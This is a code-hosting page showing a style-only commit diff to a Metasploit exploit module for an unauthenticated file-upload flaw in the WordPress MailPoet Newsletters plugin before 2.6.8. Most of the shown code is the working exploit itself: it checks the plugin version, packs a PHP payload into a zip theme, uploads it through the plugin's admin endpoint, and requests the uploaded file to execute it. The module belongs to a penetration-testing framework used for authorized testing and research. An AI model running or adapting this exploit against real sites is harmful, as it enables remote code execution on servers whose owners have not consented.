infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix rubocop warnings

bug/bundler_fix
Christian Mehlmauer 2014-07-18 21:58:33 +02:00
parent 942112d18e
commit c6e129c622
No known key found for this signature in database
GPG Key ID: BCFF4FA966BC32C7
1 changed files with 18 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

37
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
View File

@ -1,3 +1,5 @@
# encoding: UTF-8
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
@ -12,7 +14,8 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
super(update_info(
info,
'Name' => 'Wordpress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload',
'Description' => %q{
The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.8
@ -34,14 +37,14 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ],
[ 'URL', 'http://www.mailpoet.com/security-update-part-2/'],
[ 'URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php']
['URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html'],
['URL', 'http://www.mailpoet.com/security-update-part-2/'],
['URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['wysija-newsletters < 2.6.8', {}] ],
'Targets' => [['wysija-newsletters < 2.6.8', {}]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 1 2014'))
end
@ -58,8 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote
}
zip_file = Rex::Zip::Archive.new
content.each_pair do |name, content|
zip_file.add_file(name, content)
content.each_pair do |name, con|
zip_file.add_file(name, con)
end
zip_file.pack
@ -67,14 +70,12 @@ class Metasploit3 < Msf::Exploit::Remote
def check
readme_url = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wysija-newsletters', 'readme.txt')
res = send_request_cgi({
res = send_request_cgi(
'uri' => readme_url,
'method' => 'GET'
})
)
# no readme.txt present
if res.nil? || res.code != 200
return Msf::Exploit::CheckCode::Unknown
end
return Msf::Exploit::CheckCode::Unknown if res.nil? || res.code != 200
# try to extract version from readme
# Example line:
@ -82,9 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
version = res.body.to_s[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]
# readme present, but no version number
if version.nil?
return Msf::Exploit::CheckCode::Detected
end
return Msf::Exploit::CheckCode::Detected if version.nil?
print_status("#{peer} - Found version #{version} of the plugin")
@ -114,13 +113,13 @@ class Metasploit3 < Msf::Exploit::Remote
payload_uri = normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wysija', 'themes', theme_name, payload_name)
print_status("#{peer} - Uploading payload to #{payload_uri}")
res = send_request_cgi({
res = send_request_cgi(
'method' => 'POST',
'uri' => uri,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'vars_get' => { 'page' => 'wysija_campaigns', 'action' => 'themes' },
'data' => post_data
})
)
if res.nil? || res.code != 302 || res.headers['Location'] != 'admin.php?page=wysija_campaigns&action=themes&reload=1&redirect=1'
fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
@ -135,9 +134,9 @@ class Metasploit3 < Msf::Exploit::Remote
print_warning("#{peer} - The theme folder #{theme_name} can not be removed. Please delete it manually.")
print_status("#{peer} - Executing payload #{payload_uri}")
res = send_request_cgi({
send_request_cgi(
'uri' => payload_uri,
'method' => 'GET'
})
)
end
end